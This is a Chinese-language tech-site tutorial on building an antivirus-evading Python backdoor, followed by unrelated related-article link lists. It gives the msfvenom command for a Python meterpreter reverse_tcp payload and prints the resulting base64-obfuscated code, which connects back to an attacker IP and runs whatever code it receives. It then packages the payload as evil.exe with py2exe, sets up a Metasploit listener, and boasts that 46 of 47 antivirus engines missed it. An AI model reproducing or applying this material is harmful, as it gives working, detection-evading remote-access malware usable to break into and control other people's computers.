编程 Python

使用Python进行防病毒免杀解析

Posted in Python onDecember 13, 2019

很多渗透工具都提供了权限维持的能力，如Metasploit、Empire和Cobalt Strike，但是都会被防病毒软件检测到这种恶意行为。在探讨一个权限维持技巧的时候，似乎越来越多的人关注的是，这个方式会不会被被杀软杀掉？

打造免杀的payload成了一个很重要的话题，在这里，本文将介绍如何使用Pyhton轻松绕过防病毒软件。

0x01 环境准备

1、软件安装

Python 2.7.16 x86：https://www.python.org/ftp/python/2.7.16/python-2.7.16.msi
Py2exe 32位：https://sourceforge.net/projects/py2exe/files/py2exe/0.6.9/py2exe-0.6.9.win32-py2.7.exe/download

2、msfvenom生成Python Payload

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.28.128 LPORT=443 -f raw -o /var/www/html/evil.py

使用Python进行防病毒免杀解析

evil.py 代码如下：

import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]]('aW1wb3J0IHNvY2tldCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjguMTI4Jyw0NDMpKQoJCWJyZWFrCglleGNlcHQ6CgkJdGltZS5zbGVlcCg1KQpsPXN0cnVjdC51bnBhY2soJz5JJyxzLnJlY3YoNCkpWzBdCmQ9cy5yZWN2KGwpCndoaWxlIGxlbihkKTxsOgoJZCs9cy5yZWN2KGwtbGVuKGQpKQpleGVjKGQseydzJzpzfSkK')))

0x02 py2exe 打包Python程序

将evil.py复制到windows，同时创建一个setup.py文件：

from distutils.core import setup
import py2exe
setup(
name = 'Meter',
description = 'Python-based App',
version = '1.0',
console=['evil.py'],
options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}},
zipfile = None,
)

下面的方法运行 evil.py，生成可执行文件。

python ./setup.py py2exe

使用Python进行防病毒免杀解析

0x03 设置监听端口

Kali 运行Metasploit，设置监听：

msfconsole
use exploit/multi/handler
set PAYLOAD python/meterpreter/reverse_tcp
set LHOST 192.168.28.128
set LPORT 443
run

在Windows中运行evil.exe，获得一个meterpreter的会话

使用Python进行防病毒免杀解析

0x04 免杀验证

确认生成的exe文件可正常工作，接下来对evil.exe进行在线病毒扫描，以确认免杀效果如何。
这里我们使用VirSCAN.org-多引擎在线病毒扫描网 v1.02,当前支持 47 款杀毒引擎

使用Python进行防病毒免杀解析

扫描结果：47款杀毒引擎中，只有一个引擎报毒，主流的杀毒软件全部绕过。

网站地址: http://www.virscan.org

参考文章：

https://medium.com/bugbountywriteup/antivirus-evasion-with-python-49185295caf1

总结

以上所述是小编给大家介绍的使用Python进行防病毒免杀，希望对大家有所帮助，如果大家有任何疑问请给我留言，小编会及时回复大家的。在此也非常感谢大家对三水点靠木网站的支持！
如果你觉得本文对你有帮助，欢迎转载，烦请注明出处，谢谢！

使用Python进行防病毒免杀解析

- Author -

Bypass

声明：登载此文出于传递更多信息之目的，并不意味着赞同其观点或证实其描述。

Python 相关文章推荐

python使用paramiko模块实现ssh远程登陆上传文件并执行

Jan 27 Python

Python使用MySQLdb for Python操作数据库教程

Oct 11 Python

Python中__new__与__init__方法的区别详解

May 04 Python

Python基于sftp及rsa密匙实现远程拷贝文件的方法

Sep 21 Python

python3之模块psutil系统性能信息使用

May 30 Python

Python3.7中安装openCV库的方法

Jul 11 Python

使用python实现抓取腾讯视频所有电影的爬虫

Apr 15 Python

django 控制页面跳转的例子

Aug 06 Python

python爬虫爬取监控教务系统的思路详解

Jan 08 Python

python计算auc的方法

Sep 09 Python

详解Python中的文件操作

Jan 14 Python

python游戏开发之pygame实现接球小游戏

Apr 22 Python

python 使用shutil复制图片的例子

Dec 13 #Python

基于python traceback实现异常的获取与处理

Dec 13 #Python

python 实现批量替换文本中的某部分内容

Dec 13 #Python

django多种支付、并发订单处理实例代码

Dec 13 #Python

Python+OpenCV+图片旋转并用原底色填充新四角的例子

Dec 12 #Python

Python+OpenCV 实现图片无损旋转90°且无黑边

Dec 12 #Python

使用python去除图片白色像素的实例

Dec 12 #Python

You might like

让PHP支持页面回退的两种方法

2008/01/10 PHP

PHP中基于ts与nts版本- vc6和vc9编译版本的区别详解

2013/04/26 PHP

phpmyadmin config.inc.php配置示例

2013/08/27 PHP

Laravel 5.5 实现禁用用户注册示例

2019/10/24 PHP

Javascript 的addEventListener()及attachEvent()区别分析

2009/05/21 Javascript

Javascript和HTML5利用canvas构建Web五子棋游戏实现算法

2013/07/17 Javascript

树结构之JavaScript

2017/01/24 Javascript

详解如何让Express支持async/await

2017/10/09 Javascript

Vue.js实现列表清单的操作方法

2017/11/15 Javascript

深入了解JavaScript词法作用域

2020/07/29 Javascript

纯js+css实现在线时钟

2020/08/18 Javascript

[15:57]教你分分钟做大人：斧王

2014/10/30 DOTA

Python中用Ctrl+C终止多线程程序的问题解决

2013/03/30 Python

简单使用Python自动生成文章

2014/12/25 Python

Python和GO语言实现的消息摘要算法示例

2015/03/10 Python

详解Python2.x中对Unicode编码的使用

2015/04/03 Python

Flask数据库迁移简单介绍

2017/10/24 Python

Python实现读取Properties配置文件的方法

2018/03/29 Python

详解基于django实现的webssh简单例子

2018/07/17 Python

python try except 捕获所有异常的实例

2018/10/18 Python

浅谈ROC曲线的最佳阈值如何选取

2020/02/28 Python

PyQT5 实现快捷键复制表格数据的方法示例

2020/06/19 Python

结合CSS3的布局新特征谈谈常见布局方法

2016/01/22 HTML / CSS

Mio Skincare中文官网：肌肤和身体护理

2016/10/26 全球购物

亚洲领先的旅游体验市场：Voyagin

2019/11/23 全球购物

分解成质因数(如435234=251*17*17*3*2，据说是华为笔试题)

2014/07/16 面试题

财务会计实习报告体会

2013/12/20 职场文书

小学开学寄语

2014/01/19 职场文书

服装设计师职业生涯规划范文

2014/02/28 职场文书

森马旗舰店双十一营销方案

2014/09/29 职场文书

职工年度考核评语

2014/12/31 职场文书

2015年导购员工作总结

2015/04/25 职场文书

廉洁自律承诺书范文

2015/04/28 职场文书

反腐倡廉主题教育活动总结

2015/05/07 职场文书

最美乡村教师观后感

2015/06/11 职场文书

MySQL数据库压缩版本安装与配置详细教程

2021/05/21 MySQL